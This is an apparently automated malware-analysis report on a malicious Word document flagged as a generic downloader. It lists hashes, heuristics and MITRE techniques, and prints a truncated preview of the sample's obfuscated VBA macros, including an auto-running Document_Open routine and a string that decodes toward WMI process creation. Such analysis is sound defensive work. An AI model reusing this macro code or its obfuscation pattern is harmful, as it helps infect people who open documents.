Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 af51da7bba2e8b7a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 182.4 KB
Created: 2019-12-20 12:27:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: ca4667eb7d6f07f353540890c0192194
SHA-1: c30c803bb339ca3a7fa2dcd265f84c9b4c384541
SHA-256: af51da7bba2e8b7a337fe9f491b5ab87359606ca3cc797dc83e749fa162fad72
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is an OLE (Word) document containing VBA macros, including a Document_Open procedure that runs automatically when the document is opened. The ClamAV signature additionally classifies it as a generic downloader. Although the extracted VBA source is heavily obfuscated (padded with junk loops and string assignments) and the preview is truncated, the combination of an auto-executing Document_Open macro and the downloader classification strongly suggests the document is built to fetch and execute a second-stage payload. No specific malware family could be identified.

Heuristics (6)

  • ClamAV: Doc.Downloader.Generic-7469790-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7469790-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro (auto-executes when the document is opened)
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call (used to obtain a COM object reference from VBA)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier, so on its own it is not an indicator of network activity.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7456 bytes
SHA-256: 510b9fb2df740ca55054380eece8ab243b2f32c2b7ef22a42e4ab34c92a53a2e

Script preview (first 1,000 lines of the extracted macro source, shown as extracted):
Attribute VB_Name = "Eehltfkxwg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Deihnpxkvtdue, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Zzetriydl = 234 + 423
   Do While Syntoazphs = 1
      Anccvwtv = 3 * Dhhowgdrgs
      Txscrbspdml = ("Quibusdam soluta.")
      For Gpfdgruzh = Laesmqmvn To Eksfrcxhrwkj
         Xnzbvoldmrrx = ("Emmett")
         Napjsmkv = 223
      Next
      Zrczcjaq = Ocnurxib
Loop
Foxnzyhueflj
   Xcfiggdyau = 234 + 423
   Do While Xhpqckvi = 1
      Xwhrnsulm = 3 * Whjdossav
      Fcihmzzn = ("Henry")
      For Gseiaptkdohl = Zfnnrchk To Qejggvmyomqpe
         Dzqrwtuhhhg = ("Stella")
         Vhlvxirvgm = 223
      Next
      Bjwjkkbsz = Rtycwxbz
Loop
End Sub

Attribute VB_Name = "Ohxgbrilhx"
Attribute VB_Base = "0{1DDA49EA-E0D8-4BFA-BB2F-7D387BA46C00}{83E60713-1A19-44BE-A8C0-8D646D635586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Dndcbirsevqkp"
Function Xuuxbxyddksr()
   Xzkikmkkawzqg = 234 + 423
   Do While Sxalnqkyzwkkf = 1
      Bybmwtozzgtx = 3 * Djyqrtqria
      Allzbfsgvap = ("Nisi.")
      For Fexaeusuovn = Ozckqahjscnz To Fjocuealosq
         Msmpyohqt = ("Wendy")
         Komgnbkbzf = 223
      Next
      Attgtdkjum = Qgnolxymedrg
Loop
Irulcyqkihc = Eehltfkxwg.Deihnpxkvtdue
   Kiamvpznfhaxi = 234 + 423
   Do While Qjtcsrzdngxcz = 1
      Gwbeelshtsl = 3 * Hywxibwcb
      Ekemfynzm = ("Odit consequatur quia facilis.")
      For Eweakxca = Lsvpkztyf To Cwathgcue
         Pgtathqyabjx = ("Cameron")
         Iwvzubhgwcze = 223
      Next
      Rafgvscp = Gligkdszhb
Loop
Fbpmdeqbfmi = Irulcyqkihc + Ohxgbrilhx.Eifyggspoteqz + Ohxgbrilhx.Uyvcnxvrjqu + Ohxgbrilhx.Uvmyjiyvnrl
   Uvmvbbxybkkv = 234 + 423
   Do While Tzxyivsugpx = 1
      Pmzeyhelrsota = 3 * Kcfmvbcicibl
      Pxxrchlb = ("Ea aut dolorum incidunt aliquam quis.")
      For Nzebgjeiqy = Jlpxndxw To Elcvqcywiiwty
         Acsdsuaqlnmce = ("Debitis et.")
         Ekprutzkt = 223
      Next
      Uqbgpmsbnb = Ebeuqieatdad
Loop
Iqfvaqfrc = Fbpmdeqbfmi + Ohxgbrilhx.Qjhxhbtex + Ohxgbrilhx.Nosfhhwouzj.Tag
   Zuvtyrngvv = 234 + 423
   Do While Rdqzmzykzmdx = 1
      Ebojswaptpyy = 3 * Gljxbcjlzxiz
      Lmqymemm = ("Error sed qui repellendus veritatis ea.")
      For Dytckbanmd = Dgvflsbrbsc To Gzaliitu
         Djgbywunqwxi = ("Sit enim.")
         Htukakkv = 223
      Next
      Dbacevjtgmswe = Uhfmegyp
Loop
Xuuxbxyddksr = Btwdsehbglq + Iqfvaqfrc + Btwdsehbglq
   Vxftjzioj = 234 + 423
   Do While Qjvndqwxkmznc = 1
      Xcudfewp = 3 * Nfbcftuhfzj
      Rcqpuvvkc = ("Dolorum quasi qui.")
      For Cfugltutzv = Uvesffxgrj To Appbuagl
         Aayowmfpolbr = ("Porro.")
         Pcpffgrskrfw = 223
      Next
      Zzpercuetril = Vjbitvmr
Loop
End Function
Function Foxnzyhueflj()
   Pnrpeqoknclfz = 234 + 423
   Do While Mxqczuwld = 1
      Hcgohlem = 3 * Usguagyunaiw
      Wbixbtcoga = ("Quas a error aut voluptatem sunt voluptatibus quia magnam ut.")
      For Ezuabmhpsf = Ynyqpivka To Gcglcqgmgkoc
         Nzvpmtrs = ("Ab.")
         Nvlzyeyljhoyu = 223
      Next
      Zmsdxjlzq = Avncaobhx
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Sxlfaxujllvgc = 234 + 423
   Do While Exsvlpyg = 1
      Ljjjyramz = 3 * Bfkuwgahg
      Migpynajuq = ("Enim.")
      For Pnlanuvucnsds = Ojxznuzw To Jsmlqvrj
         Glfnmltjypdw = ("Accusantium beatae unde quo vitae totam velit.")
         Mawrecprjy = 223
      Next
      Iilsaukn = Djmcaqxl
Loop
Jbtqdshtfr = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Eehltfkxwg.Deihnpxkvtdue + "__
... (truncated)